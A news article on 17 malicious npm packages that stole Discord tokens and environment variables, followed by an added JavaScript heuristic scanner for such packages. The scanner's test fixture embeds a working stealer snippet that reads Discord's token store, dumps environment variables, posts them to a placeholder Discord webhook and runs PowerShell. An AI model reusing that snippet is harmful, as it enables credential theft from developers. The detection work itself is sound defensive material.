
Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers
2021-12-08 23:02

At least 17 malware-laced packages have been discovered on the npm package registry, adding to a recent barrage of malicious software hosted and delivered through open-source software repositories such as PyPI and RubyGems.

DevOps firm JFrog said the libraries, now taken down, were designed to grab Discord access tokens and environment variables from users' computers as well as gain full control over a victim's system.

As prior research has established, collaboration and communication tools like Discord and Slack have become handy mechanisms for cybercriminals, with Discord servers integrated into attack chains for remotely controlling infected machines and even for exfiltrating data from victims.

"Cyber criminals are using Discord CDN to host malicious files as well as for command-and-control communication," cybersecurity firm Zscaler noted in an analysis earlier this February.

In light of these disclosures, it's no surprise that the theft of Discord access tokens could enable threat actors to use the platform as a covert data exfiltration channel, distribute malware to other Discord users, and even sell Discord Nitro premium accounts to third parties, who can then use them for their own campaigns.

Even more troublingly, the package "Prerequests-xcode" functioned as a full-fledged remote access trojan, a Node.js port of DiscordRAT, equipped to capture screenshots, gather clipboard data, execute arbitrary VBScript and PowerShell code, steal passwords, and download malicious files, effectively granting the adversary the ability to take over the developer's system.
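The behaviours described above (install-time execution, dumping environment variables, reading Discord tokens, Discord as an exfiltration or C2 channel, and spawning PowerShell or VBScript hosts) can be turned into a simple triage check for a package before it is allowed into a build. The following is an added example, not code from the article, from JFrog's research or from the packages themselves: it audits an in-memory description of an npm package (its parsed package.json plus its source files) against heuristic indicators. The indicator list, the token-format regex fragments and the two sample packages are assumptions constructed for illustration, not the specific code of the packages that were taken down.

```javascript
// Added example (not code from the article or from JFrog): a heuristic audit
// that flags an npm package exhibiting the stealer / RAT behaviours the
// article describes. Works on an in-memory package description so it runs
// offline; the indicators are assumptions about common stealer patterns.

// Literal fragments of the Discord token regex that stealers typically embed
// (assumed format: 24 chars "." 6 chars "." 27 chars, or "mfa." + 84 chars).
// String.raw keeps the backslashes intact so the search is for the literal text.
const TOKEN_REGEX_LITERALS = [
  String.raw`{24}\.[\w-]{6}\.[\w-]{27}`,
  String.raw`mfa\.[\w-]{84}`,
];

// Each rule: a name, a predicate over one file's source text, and a reason.
const SOURCE_RULES = [
  {
    rule: "env-dump",
    test: (src) => /JSON\.stringify\(\s*process\.env\s*\)/.test(src),
    why: "serialises the whole process environment (credential harvesting)",
  },
  {
    rule: "discord-token-regex",
    test: (src) => TOKEN_REGEX_LITERALS.some((lit) => src.includes(lit)),
    why: "embeds a regex matching the Discord token format",
  },
  {
    rule: "discord-local-storage",
    test: (src) => /discord.{0,120}(leveldb|Local Storage)/is.test(src),
    why: "reads Discord's local storage, where the client keeps its token",
  },
  {
    rule: "discord-webhook",
    test: (src) => /discord(app)?\.com\/api\/webhooks\//i.test(src),
    why: "posts to a Discord webhook, a common exfiltration / C2 channel",
  },
  {
    rule: "script-host-exec",
    test: (src) =>
      /child_process/.test(src) && /\b(powershell|cscript|wscript)\b/i.test(src),
    why: "spawns PowerShell or the Windows Script Host from library code",
  },
];

// npm runs these automatically during `npm install`, so they are the usual
// execution vector for a malicious package.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// pkg = { packageJson: <parsed package.json>, files: { "<path>": "<source>" } }
function auditPackage(pkg) {
  const findings = [];
  const scripts = (pkg.packageJson && pkg.packageJson.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) {
      findings.push({ rule: "install-hook", file: "package.json", evidence: `${hook}: ${scripts[hook]}` });
    }
  }
  for (const [file, src] of Object.entries(pkg.files || {})) {
    for (const r of SOURCE_RULES) {
      if (r.test(src)) findings.push({ rule: r.rule, file, evidence: r.why });
    }
  }
  return findings;
}

// An install hook on its own is common in legitimate packages (native builds),
// so it only escalates the verdict when combined with a stealer-style rule.
function verdict(findings) {
  const rules = new Set(findings.map((f) => f.rule));
  const stealerHits = [...rules].filter((r) => r !== "install-hook").length;
  if (stealerHits >= 2 || (rules.has("install-hook") && stealerHits >= 1)) return "suspicious";
  return rules.size > 0 ? "review" : "clean";
}

// Constructed sample of a stealer-style package (hypothetical, not a real package).
const MALICIOUS_SAMPLE = {
  packageJson: { name: "example-stealer", version: "1.0.0", scripts: { postinstall: "node index.js" } },
  files: {
    "index.js": String.raw`
const fs = require("fs"), path = require("path"), https = require("https");
const { execSync } = require("child_process");
const TOKEN = /[\w-]{24}\.[\w-]{6}\.[\w-]{27}|mfa\.[\w-]{84}/g;
const store = path.join(process.env.APPDATA || "", "discord", "Local Storage", "leveldb");
const tokens = fs.readdirSync(store).flatMap((f) => fs.readFileSync(path.join(store, f), "latin1").match(TOKEN) || []);
const body = JSON.stringify({ env: JSON.stringify(process.env), tokens });
https.request("https://discord.com/api/webhooks/0000/abcdef", { method: "POST" }).end(body);
execSync('powershell -c "Get-Clipboard"');
`,
  },
};

// Constructed benign sample: an install hook for a native build, nothing else.
const BENIGN_SAMPLE = {
  packageJson: { name: "example-addon", version: "2.0.0", scripts: { postinstall: "node-gyp rebuild" } },
  files: { "index.js": 'module.exports = require("./build/Release/addon.node");' },
};

for (const sample of [MALICIOUS_SAMPLE, BENIGN_SAMPLE]) {
  const findings = auditPackage(sample);
  console.log(sample.packageJson.name, "->", verdict(findings), findings.map((f) => f.rule));
}
```

In practice you would feed `auditPackage` the extracted contents of a tarball from `npm pack` before it reaches `node_modules`; the rules are deliberately coarse and will need tuning, and a "review" verdict on a package with only an install hook is expected for native addons.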


News URL

https://thehackernews.com/2021/12/over-dozen-malicious-npm-packages.html